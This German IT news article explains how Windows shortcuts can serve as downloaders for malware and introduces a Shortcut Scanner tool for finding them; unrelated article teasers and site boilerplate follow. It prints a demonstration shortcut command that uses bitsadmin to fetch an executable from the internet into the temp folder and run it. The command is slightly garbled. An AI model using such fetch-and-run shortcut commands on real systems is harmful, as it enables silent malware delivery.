Eine Verknüpfung unter Windows kann problemlos einen Virus aus dem Internet laden und starten. So verhindern Sie das. [...]
Das Tool Shurtcut Scanner zeigt Ihnen alle in Windows hinterlegten Verknüpfungen (Shortcuts) an. Das ist zum Beispiel dann sinnvoll, wenn Sie Ihren Rechner auf gefährliche Shortcuts überprüfen wollen. Darauf weist der Hersteller des Tools hin. Was zunächst etwas merkwürdig klingt („gefährliche Shortcuts“), ist aber ein durchaus berechtigter Hinweis. Denn der Angriff mit Schadcode auf einen PC läuft sehr oft in zwei Schritten ab.
Zunächst versuchen die Virenverbreiter, einen sogenannten Downloader auf den PC zu platzieren. Das ist ein kleines Programm, das nichts anders macht, als den eigentlichen Virus auf den PC herunterzuladen und zu starten. Der Grund für die Zweiteilung in Download-Code und Virus liegt bei den üblichen Schutzmechanismen. So setzen etwa alle großen Maildienst-Anbieter Virenscanner ein, die den Anhang jeder Mail scannen. Finden Sie dort einen Virus, wird dieser gelöscht. Ein Download-Code dagegen sieht für einen Virenscanner oft harmlos aus. Der Code richtet ja scheinbar nicht viel an. Entsprechend leichter ist es für den Angreifer einen Downloader per Mail zu verteilen.
Verknüpfungen: Auch hinter einer Verknüpfung kann sich ein Download-Code verstecken. Der Code kann sogar komplett aus Bordmitteln von Windows bestehen. So muss ein Angreifer nicht einmal mehr eine EXE- oder DLL-Datei auf den PC schleusen, sondern nur noch den Code, der eine Verknüpfung unter Windows erstellen kann.
Der Hersteller des Tools Shurtcut Scanner, Phrozen Software, gibt ein eindrückliches Beispiel für einen solchen Code, den Sie auch selber ausprobieren können. Klicken Sie mit der rechten Maustaste auf Ihren Desktop und wählen Sie „Neu -> Verknüpfung“. In das folgende Feld geben Sie diesen Befehl ein: Befehl cmd.exe /C „%windir%System32bitsadmin.exe /transfer downloader /priority normalhttps://phrozensoft.com/uploads/2016/09/ Winja_2_6084_65441_setup.exe%temp%setup.exe & %temp%setup.exe“
Ein Klick auf „Weiter“ und „Fertigstellen“ legt die neue Verknüpfung auf den Desktop ab. Nun Bedarf es noch eines kleinen Tricks, den Anwender zum Klick auf die Verknüpfung zu überreden und schon landet Code aus dem Internet auf Ihrem PC und wird gestartet. In diesem Beispiel ist es aber nur das Tool Winja vom Herteller Phrozen Software. Es lädt auf Wunsch Dateien zu einem Online-Virenscanner hoch.
Shortcut Scanner nutzen: Starten Sie das Tool Shortcut Scanner in der für Sie passenden Version, also als 32- oder 64-Bit-Version. Es läuft ohne Installation. Klicken Sie auf das Ordnersymbol und wählen Sie „Full Scan“, um alle Festplatten nach Verknüpfungen durchsuchen zu lassen.
Nach dem Suchlauf listet das Tool alle verdächtigen Verknüpfungen auf und sortiert sie nach ihrer möglichen Gefährlichkeit („Dangerous“, „Suspicous“ und „Broken“). Eine eindeutige Aussage über eine Verknüpfung macht das Tool nicht, sodass Sie sich den Fund noch einmal selber genau prüfen müssen. Möchten Sie eine Verknüpfung beseitigen, dann setzen Sie einen Haken davor und klicken oben auf das Radiergummisymbol. Dort wählen Sie dann die Gefährlichkeitsstufe aus, die Sie bereinigen wollen.
*Arne Arnold arbeitet seit über 15 Jahren bei der PC-WELT als Redakteur in den Bereichen Software und Internet
Mit der zunehmenden Verbreitung generativer KI-Lösungen stehen Unternehmen vor neuen Herausforderungen. Datenschutz, Kostenkontrolle und regulatorische Anforderungen rücken in den Fokus. Fujitsu hat mit „Private GPT“ eine Lösung entwickelt, die speziell auf die Bedürfnisse von Unternehmen zugeschnitten ist und höchste Sicherheitsstandards erfüllt. ITWelt.at hat darüber mit Udo Würtz, Fellow und Chief Data Officer, Fujitsu European Platform Business, gesprochen. […]
Das Konzept der „Cyber Immunity“ beschreibt IT- und OT-Systeme, die aufgrund speziellerer Entwicklungsmethoden und architektonischer Anforderungen „secure-by-design“ sind und über eine eingebaute Widerstandsfähigkeit gegenüber Cyberangriffen verfügen. […]
Falschinformation, Polarisierung, Filterblasen: die moderne Demokratie ist zahlreichen Bedrohungen ausgesetzt. Als Antwort darauf will das kürzlich gestartete EU-Projekt „MultiPoD“ einen offenen, multikulturellen Raum für politische Debatten schaffen – mit Hilfe von künstlicher Intelligenz (KI). Die Koordination übernimmt das Deep Tech Unternehmen webLyzard aus Wien. […]
Anzahl und Umfang von Drittanbieter-Netzwerken steigen stetig, und damit steigt auch das Risiko durch Drittanbieter. Deren Risikobewertung muss angesichts der aktuellen Cyber-Bedrohungen eine Kernkomponente der Cyber-Resilienz-Strategie jedes Unternehmens werden. […]
Der Global Cyber Attack Report von Check Point zeigt eine starke Zunahme der Cyber-Angriffe in Östrreich – mit 69 Prozent ein stärkeres Wachstum als weltweit (47 Prozent). Global sind besonders Ransomware-Angriffe mit einem Anstieg von 126 Prozent durch die Decke gegangen. […]
Die aktuelle Mandiant-Analyse „M-Trends 2025“ von Google Cloud liefert umfassende Einblicke in globale Cyberbedrohungen des Jahres 2024. Der Bericht zeigt auf, wie Angreifer zunehmend Schwachstellen, gestohlene Zugangsdaten und unzureichend gesicherte Cloud-Umgebungen ausnutzen, um ihre Ziele zu verfolgen. ITWelt.at hat sich die Studie angesehen. […]
Die Integration künstlicher Intelligenz in Unternehmen birgt neben Produktivitätssteigerungen auch wachsende Sicherheitsrisiken. Unachtsame oder unautorisierte KI-Nutzung durch Mitarbeiter kann zu Datenlecks und anderen Bedrohungen führen. […]
41,5 Prozent der Arbeitnehmer:innen sind bei der Arbeit gestresst. Zudem sagt in einer Studie von kununu nur rund jede dritte angestellte Person (35,7 Prozent) in Österreich, dass ihr Arbeitsplatz eine gesunde Work-Life-Balance sowie das mentale oder körperliche Wohlbefinden unterstützt oder aktive Pausen fördert. […]
Die Zunahme von KI-Tools hat die Einstiegshürde für Cyberangreifer wesentlich gesenkt und ermöglicht die Erstellung und den Einsatz bösartiger Bots in großem Umfang. Zum ersten Mal seit einem Jahrzehnt hat der automatisierte Datenverkehr die menschlichen Aktivitäten übertroffen und macht 51 Prozent gesamten Internetverkehrs aus. […]
Aktuelle Business IT-News für Österreich. Die ITWELT (vormals: COMPUTERWELT) ist Österreichs führende IT- Zeitung für den gesamten Bereich der Informationstechnik und Telekommunikation. Wir schreiben für leitende IT- Experten (IT-Leiter, CIO) in IT-Branche und EDV-Abteilungen. Unsere Themen: Business Software, Netzwerk, Security, Mobile Kommunikation, Infrastruktur, Cloud, Wirtschaft, IT-Innovation. Zudem finden Sie hier IT-Anbieter, Whitepaper, Webinare, Termine, Social Events und Praxisreports aus der IT und ITK Branche. (c) 2024 - ITW Verlag GmbH
Artikel Empfehlung
Anmeldung Roundtable
Keine Felder gefunden.
Datenschutz Newsletter
Ich erhalte den Newsletter der Computerwelt c/o CW Fachverlag GmbH, Halbgasse 3-5 in 1070 Wien.
Meine Daten werden sicher gespeichert und niemals an Dritte weitergegeben.
Eine Abmeldung vom Newsletter, sowie Anmeldungen zu weiteren Services ist durch einen Link am Ende des Newsletters möglich.
Sie sehen gerade einen Platzhalterinhalt von Facebook. Um auf den eigentlichen Inhalt zuzugreifen, klicken Sie auf die Schaltfläche unten. Bitte beachten Sie, dass dabei Daten an Drittanbieter weitergegeben werden.
Sie sehen gerade einen Platzhalterinhalt von Instagram. Um auf den eigentlichen Inhalt zuzugreifen, klicken Sie auf die Schaltfläche unten. Bitte beachten Sie, dass dabei Daten an Drittanbieter weitergegeben werden.
Sie sehen gerade einen Platzhalterinhalt von X. Um auf den eigentlichen Inhalt zuzugreifen, klicken Sie auf die Schaltfläche unten. Bitte beachten Sie, dass dabei Daten an Drittanbieter weitergegeben werden.
Be the first to comment